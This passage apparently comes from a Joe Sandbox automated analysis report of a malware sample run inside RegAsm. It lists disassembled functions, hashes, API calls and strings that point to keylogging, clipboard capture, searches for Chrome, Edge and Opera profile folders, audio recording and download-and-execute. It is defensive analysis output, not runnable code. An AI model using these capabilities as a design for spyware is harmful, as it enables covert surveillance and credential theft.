                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 1000655C
                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                • String ID: image/jpeg
                                                • API String ID: 1291196975-3785015651
                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer__onexit
                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                • API String ID: 1881088180-3686566968
                                                • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                • String ID: image/png
                                                • API String ID: 1291196975-2966254431
                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 481472006-1507639952
                                                • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32 ref: 0041667B
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DownloadFileSleep
                                                • String ID: !D@
                                                • API String ID: 1931167962-604454484
                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: : $Se.
                                                • API String ID: 4218353326-4089948878
                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: | $%02i:%02i:%02i:%03i
                                                • API String ID: 481472006-2430845779
                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: alarm.wav$hYG
                                                • API String ID: 1174141254-2782910960
                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                • String ID: Online Keylogger Stopped
                                                • API String ID: 1623830855-1496645233
                                                • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                • waveInPrepareHeader.WINMM(007F9030,00000020,?), ref: 00401849
                                                • waveInAddBuffer.WINMM(007F9030,00000020), ref: 0040185F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferHeaderPrepare
                                                • String ID: XMG
                                                • API String ID: 2315374483-813777761
                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocaleValid
                                                • String ID: IsValidLocaleName$kKD
                                                • API String ID: 1901932003-3269126172
                                                • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                • API String ID: 1174141254-4188645398
                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                • API String ID: 1174141254-2800177040
                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                • API String ID: 1174141254-1629609700
                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                • String ID: [AltL]$[AltR]
                                                • API String ID: 2738857842-2658077756
                                                • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: !D@$open
                                                • API String ID: 587946157-1586967515
                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State
                                                • String ID: [CtrlL]$[CtrlR]
                                                • API String ID: 1649606143-2446555240
                                                • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                Strings
                                                Memory Dump Source
